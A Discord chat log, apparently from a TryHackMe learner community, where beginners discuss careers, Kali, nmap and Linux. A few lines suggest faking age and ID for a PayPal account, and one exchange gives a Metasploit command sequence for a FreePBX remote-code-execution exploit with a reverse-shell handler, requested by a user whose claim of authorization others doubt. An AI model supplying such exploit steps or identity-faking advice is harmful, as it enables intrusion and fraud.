i wnna get paypal acc setup but my parents aint letting
-# fake your age...
pure steeple
I like C to start because it is lower level and gives students practice with concepts like memory, pointers, a compiler etc. You need to understand how computers work to break them. I'm not saying you need to know C in detail or spend more than 2-3 weeks. You can move to a higher level language like Python. But they designed the learning path in CS50 intentionally, and it is very successful.
stuck ridge
https://klipy.com/gifs/fadding-smart
-# and enter your id number as 1234567890
-# dont tell anyone this
wet eagle
is it hard to be a bug bounty? I mean is it necessary to have a degree or is it sheer practice? I was thinking about doing so
pure steeple
is it hard to be a bug bounty? I mean is it necessary to have a degree or is it ...
yes
tame axle
-# dont tell anyone this
continues to say it in a public group
wet eagle
pure steeple
barf
stuck ridge
is it hard to be a bug bounty? I mean is it necessary to have a degree or is it ...
Every jobs in this field is hard, you have to accept the fact that finding jobs and get pay in this field is very hard
tame axle
wet eagle
Every jobs in this field is hard, you have to accept the fact that finding jobs ...
are you speaking from experience?
pure steeple
Every jobs in this field is hard, you have to accept the fact that finding jobs ...
Everyone wants to make money and survive. There are x jobs and y applicants. You will need to be better than 50% of the other applicants, at least. So start skilling up.
stuck ridge
oki, I will still have in mind your advice :))
A wise teenager advice
pure steeple
A wise teenager advice
this is an oxymoron
wet eagle
Is that nmap?
tame axle
Im still a teenager
keep learning like me devlop skills then later when ur applying for a job it will be easy
stuck ridge
Is that nmap?
No, it is my ultra sigma hyper threading ddos 5000 attacker
-# jk it is nmap
paper kettle
hey is it normal that in this room
https://tryhackme.com/room/winadbasics
There's ALWAYS someone logged on Sophie's Desktop and I cant get Flag from it? its task 4 and I've been waiting for like an hour now
tame axle
ima put this in ma tt story
stuck ridge
keep learning like me devlop skills then later when ur applying for a job it w...
Im planing to go to blue team when im apply for a job
pure steeple
No, it is my ultra sigma hyper threading ddos 5000 attacker
spends $5000, gets code that is just nmap in a while loop ... typical hacking transaction
wet eagle
wut that mean?
wet eagle
spends $5000, gets code that is just nmap in a while loop ... typical hacking tr...
do hackers use gaming laptop? ๐ค Always wondered that
stuck ridge
do hackers use gaming laptop? ๐ค Always wondered that
I can hack in a mobile phone if it have kali or parrot installed
pure steeple
do hackers use gaming laptop? ๐ค Always wondered that
pretty sure they use whatever they can get their hands on
stuck ridge
Or a fridge
tame axle
i love the music in this whats the name
tame axle
do hackers use gaming laptop? ๐ค Always wondered that
thinkpad
agile topaz
do hackers use gaming laptop? ๐ค Always wondered that
What matters most is skill not the laptop
wet eagle
I can hack in a mobile phone if it have kali or parrot installed
I believe you need root for doing so right?
stuck ridge
i love the music in this whats the name
Dancing nihist (idk if it is right)
wet eagle
What matters most is skill not the laptop
Okayy!!
stuck ridge
I believe you need root for doing so right?
Yes, for kali, parrot doesnt have a img for mobile yet
agile topaz
Okayy!!
But honestly a real hacker could still hack you with a potato laptop if they have the skills
stuck ridge
But honestly a real hacker could still hack you with a potato laptop if they hav...
I can hack from the smart frigde if they have kali installed and internet connection
Or smart toaster
wet eagle
is you're a tinkerer is it necessary doing root or with doing proot is just enough?
pure steeple
nah, can't hack me, I run bsd v1.0, patched
stuck ridge
is you're a tinkerer is it necessary doing root or with doing proot is just enou...
What is it?
wet eagle
What is it?
what?
pure steeple
A tinker is
a person who makes minor, often experimental repairs on mechanical or household items, or an archaic term for an itinerant mender of pots and pans. As a verb, to tinker means to fix, adjust, or experiment with something in a casual, aimless, or sometimes unskillful manner.
agile topaz
I can hack from the smart frigde if they have kali installed and internet connec...
hacked from a toaster would be a legendary story
boreal scarab
hacked from a toaster would be a legendary story
@cosmic pendant You're apparently Legendary.
boreal scarab
cosmic pendant
I've hacked coffee pot before
wet eagle
:0
stuck ridge
is you're a tinkerer is it necessary doing root or with doing proot is just enou...
I think if u can u should root (only if the phone you rooted isnt important)
pure steeple
do it now b/c I need it to give me more coffee
tame axle
@bold rover how dose it look so far ?
wet eagle
I think if u can u should root (only if the phone you rooted isnt important)
Okayy!!
Also one question
why is Kali so important for you when talking about hacking?
๐ค
stuck ridge
why is Kali so important for you when talking about hacking?
It is a toolbox
pure steeple
it's just convenient, it has lots of tools pre-installed
stuck ridge
And it is designed to hack
agile topaz
I've hacked coffee pot before
now it brews root access instead of coffee
stuck ridge
Only...to hack
wet eagle
no sudo apt install needed?
stuck ridge
You cannot use it for daily use, its repo only have tools
wet eagle
Oo
tame axle
i thought of adding sound effects to the typing
pure steeple
You cannot use it for daily use, its repo only have tools
You can pull packages from other repos
boreal scarab
I've hacked coffee pot before
No no no, NO. You're banned from Coffee, mr "I put it in the microwave" ass
stuck ridge
You can pull packages from other repos
Oh
agile topaz
now it brews root access instead of coffee
If it were real it would basically be IoT security testing
tame axle
ah alr
cosmic pendant
now it brews root access instead of coffee
It was really cool, it was at a national lab, you had to hack the coffee pot each morning to get it started
wet eagle
can I hack a lightbulb like in watchdog2? ๐ค
stuck ridge
You can pull packages from other repos
But i remember that their devs even dont recommended to use kali as a daily os
stuck ridge
can I hack a lightbulb like in watchdog2? ๐ค
If it is a smart one
tame axle
currently outa 10 how much would you give it
stuck ridge
You can exploit its firmware and get in
pure steeple
But i remember that their devs even dont recommended to use kali as a daily os
who is "devs"
bold rover
<@1472811434608951469> how dose it look so far ?
Looking good 
wet eagle
Okay!
stuck ridge
who is "devs"
developers
pure steeple
Just do what you want to do, there are very few absolutes
stuck ridge
Yea
agile topaz
who is "devs"
Cool that sounds like the most hacker workplace ever
agile topaz
Imagine coming to work and instead of a keycard you run a quick exploit
stuck ridge
Imagine coming to work and instead of a keycard you run a quick exploit
Woah
wet eagle
what does it mean when something is open source?
stuck ridge
what does it mean when something is open source?
The source is open to public, you can access it
Anyone can access it
pure steeple
Imagine coming to work and instead of a keycard you run a quick exploit
Also, the public community maintains it and makes updates to it
stuck ridge
A closed source mean you only have the .exe or binary files, you cannot access the source
wet eagle
A closed source mean you only have the .exe or binary files, you cannot access t...
Ooo, okay thanks!
twin ridgeBOT
Gave +1 Rep to @stuck ridge (current: #483 - 17)
agile topaz
https://www.jitbit.com/alexblog/249-now-thats-what-i-call-a-hacker/
Let me check
tame axle
just a blog
tame axle
im still making it
agile topaz
its about hacking coffee pots
Real hackers dont start their day with coffee they start with an SSH session to the coffee machine 
wet eagle
why do many people here use linux rather than maybe windows or macOS?
tame axle
Real hackers dont start their day with coffee they start with an SSH session to ...
caffein for the machine type shi
stuck ridge
why do many people here use linux rather than maybe windows or macOS?
Because linux is our heart
acoustic crystal
sup
stuck ridge
Open source + there are many distros
agile topaz
why do many people here use linux rather than maybe windows or macOS?
Linux is free and open source
tame axle
Because linux is our heart
my IT teacher was flaming linux yesterday
wet eagle
Ooo
pure steeple
pls rate my website: https://www.webdesignmuseum.org/uploaded/fullscreen/slashs-snakepit-1995.png
wet eagle
does that also make Linux better for daily use?
stuck ridge
If you want minimalist, arch. If you want daily use, ubuntu. If you want hacking, kali, parrot, etc
soft pike
Im having a hard time trying to run a module in metasploit. Can someone help me? can pay 5$usd lol
agile topaz
caffein for the machine type shi
stuck ridge
does that also make Linux better for daily use?
Yes, there are many distros for that like ubuntu
pure steeple
my IT teacher was flaming linux yesterday
your IT teacher is silly
stuck ridge
Im having a hard time trying to run a module in metasploit. Can someone help me?...
The support was free and you tell us that you will pay???
tame axle
your IT teacher is silly
i got sent out of the class for arguing with her
wet eagle
Yes, there are many distros for that like ubuntu
since I'm a noob, I was considering using Debian or mint
pure steeple
Im having a hard time trying to run a module in metasploit. Can someone help me?...
depends on why you're running it
stuck ridge
since I'm a noob, I was considering using Debian or mint
Debian is for server?
pure steeple
Debian is just debian
agile topaz
pls rate my website: https://www.webdesignmuseum.org/uploaded/fullscreen/slashs-...
Ill rate it like a 1995 website
wet eagle
what does that mean?
agile topaz
8/10
coarse hedge
pls rate my website: https://www.webdesignmuseum.org/uploaded/fullscreen/slashs-...
Rate mine as well, please:
https://admin.tryhackme.com/my-new-website
pure steeple
Rate mine as well, please:
<https://admin.tryhackme.com/my-new-website>
10/10
wet eagle
ahh
stuck ridge
Rate mine as well, please:
<https://admin.tryhackme.com/my-new-website>
You r not getting me, i always use it
tame axle
Rate mine as well, please:
<https://admin.tryhackme.com/my-new-website>
i hope u have a warm pilloe tonight and ur toes dont fit in ur blanket
coarse hedge
Thanks, you guys are kind
wet eagle
how do y'all not get hacked? ๐ค What methods may I ask you guys might use?
agile topaz
Rate mine as well, please:
<https://admin.tryhackme.com/my-new-website>
Nice one
pure steeple
pro tip: never trust links from anyone above 0xD rank
soft pike
depends on why you're running it
I want to execute it against local server
stuck ridge
how do y'all not get hacked? ๐ค What methods may I ask you guys might use?
Opsec, do not press on random links, never trust anything. Use zero-trust as a philosophy to you.
pure steeple
I want to execute it against local server
ok, what's your local server running, and why?
coarse hedge
how do y'all not get hacked? ๐ค What methods may I ask you guys might use?
I have an answer for that in my website
https://admin.tryhackme.com/how-to-protect-yourself?id=1
stuck ridge
And also, make your password as long as u can remember it
pure steeple
And also, make your password as long as u can remember it
Rotate passwords often
Quit League of Legends
soft pike
freepbx, I want to check if my server has been patched since updated.
wet eagle
I have an answer for that in my website
<https://admin.tryhackme.com/how-to-prot...
woahuh just told me to not click on random links ๐ค
wet eagle
Opsec, do not press on random links, never trust anything. Use zero-trust as a p...
Okayyy!! Thx
twin ridgeBOT
Gave +1 Rep to @stuck ridge (current: #463 - 18)
pure steeple
in fact, just quit the internet and go start a small farm
coarse hedge
woahuh just told me to not click on random links ๐ค
I am just helping you and making your life easier
tame axle
I have an answer for that in my website
<https://admin.tryhackme.com/how-to-prot...
dont i fell for it again
stuck ridge
woahuh just told me to not click on random links ๐ค
Yes, my boy, zero trust.
wet eagle
I am just helping you and making your life easier
okay appreciate it
tame axle
I am just helping you and making your life easier
im gonna be under ur bed tonight
stuck ridge
but I feel like it's gonna be a rickroll
Yea it is
wet eagle
heh, I knew it!!
pure steeple
freepbx, I want to check if my server has been patched since updated.
ok then try something like
msfconsole
use exploit/unix/http/freepbx_unauth_sqli_to_rce
set RHOSTS [Target-IP]
set LHOST [Your-IP]
set LPORT 4444
exploit
Lmao.
Funny, I work in SOCC..... No use if you're under my bed
bold rover
How's it going!!
Good, wbu
stuck ridge
Any request go to that subdomain of thm will get redirect to a 4k, clear version of rickroll
soft pike
ok then try something like
```
msfconsole
use exploit/unix/http/freepbx_unauth_...
Im trying with unix/http/freepbx_firmware_file_upload, I set rhost, rport, lhost, lport and run it but get this error:
[] Exploiting target 10.0.0.18
[] Started reverse TCP handler on 10.0.0.18:4444
[*] Trying to bypass authentication...
[-] Exploit aborted due to failure: unexpected-reply: Received unexpected reply
agile topaz
https://klipy.com/gifs/hospital-hello-1
Bye
pure steeple
Im trying with unix/http/freepbx_firmware_file_upload, I set rhost, rport, lhost...
Are you having the right port for your server? Is your server actually open to this path of attack? Can you do things manually with curl? Really not enough info to know whats going wrong without more logging, some packets to inspect, or source code for your server.
and make sure RHOST and LHOST are different ... right now from your output they look the same?
wet eagle
guys what was nmap for? How may I use it? I just wanna explore my own router
pure steeple
Nmap ("Network Mapper") is a free, open-source tool used for network discovery, security auditing, and inventory management. It scans networks to identify active hosts, open ports, available services (application name/version), and operating systems. Cybersecurity professionals use it to detect vulnerabilities and monitor network uptime.
soft pike
Are you having the right port for your server? Is your server actually open to ...
Yes, I set my server port to 443 and set RHOST to 443. RHOST and LHOST are different.
pure steeple
You're saying HOST stuff but giving PORT numbers. Does not compute.
wet eagle
what's that?
soft pike
Okay, let me explain better. I set up my localhost + port like this:
msf > use /exploit/multi/handler
[] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.0.0.18
LHOST => 10.0.0.18
msf exploit(multi/handler) > set LPORT 444
LPORT => 444
msf exploit(multi/handler) > exploit
[] Started reverse TCP handler on 10.0.0.18:444
And rhost is running on port 443 example ip:443
wet eagle
Okay
quick blaze
Err....what?
pure steeple
Okay, let me explain better. I set up my localhost + port like this:
msf > use ...
RHOST is missing
wet eagle
Does anyone know why is nmap not working here? I must be horrible doing this ๐ข
wat?
๐ญ
pure steeple
just do nmap 192.168.0.1 to start
wet eagle
Okay I will try that!
gloomy stag
Does anyone know why is nmap not working here? I must be horrible doing this ๐ข
first check whether target is in network or not use ping first...
soft pike
RHOST is missing
Im setting rhost correctly.
msf exploit(unix/http/freepbx_firmware_file_upload) > set LHOST 10.0.0.18
LHOST => 10.0.0.18
msf exploit(unix/http/freepbx_firmware_file_upload) > set LPORT 444
LPORT => 444
msf exploit(unix/http/freepbx_firmware_file_upload) > set USERNAME admin
USERNAME => admin
msf exploit(unix/http/freepbx_firmware_file_upload) > set RPORT 443
RPORT => 443
msf exploit(unix/http/freepbx_firmware_file_upload) > set RHOST 10.0.0.11
RHOTS => 10.0.0.11
msf exploit(unix/http/freepbx_firmware_file_upload) > run
pure steeple
RHOTS => 10.0.0.11 Metasploit didn't make this typo
wet eagle
first check whether target is in network or not use ping first...
okay!
pure steeple
So you're not copy/pasting actual output?
wet eagle
also what should I do if it says "permission denied"? ๐ค
stuck ridge
also what should I do if it says "permission denied"? ๐ค
Then idk, you need to root for permisson
soft pike
`RHOTS => 10.0.0.11` Metasploit didn't make this typo
Im replacing rhost since I don't know if I'm able to poste ips here
wet eagle
Okay
stuck ridge
And you def dont want to do that on your phone
stoic quarry
Ye
pure steeple
he said it's his home lab, but I have my doubts
soft pike
I run a freepbx server a security company that have a small call center for cs.
stoic quarry
Did one day of THM. Time to commit crimes - That guy ig
soft pike
I really appreciate help but if you guys cant help me for legal or ethical things I understand.
pure steeple
Can try https://tryhackme.com/module/metasploit and go from there, not enough info to help debug ๐
stuck ridge
"Oh, metasploit contains all the exploit???"
stoic quarry
I really appreciate help but if you guys cant help me for legal or ethical thing...
You shouldn't take legal advice from strangers on discord
soft pike
Im not taking anything, just asking for help cause dont know why I can run test
Thats all
Ty anyways
stoic quarry
A classic
stuck ridge
i need help with evilgnix
What is evilgnix??
wet eagle
I don't get it ๐ข
wet eagle
yes
chrome abyss
dude you are crazy
wet eagle
why? What's wrong?
chrome abyss
nothing . its to hard for me
tame axle
I don't get it ๐ข
you have to root the phone first of all
tame axle
nope
chrome abyss
you have to root the phone first of all
root phone ? i think use vps
tame axle
root phone ? i think use vps
he is using termux
tame axle
tame axle
https://www.youtube.com/watch?v=x4CUAuwoZVk
peak cinema
kind linden
I don't get it ๐ข
just ignore that warning. It says that , the Distro u trying to use mostly works with x64 structured processors but phones don't use those kind of processor so this warning occurs. Just ignore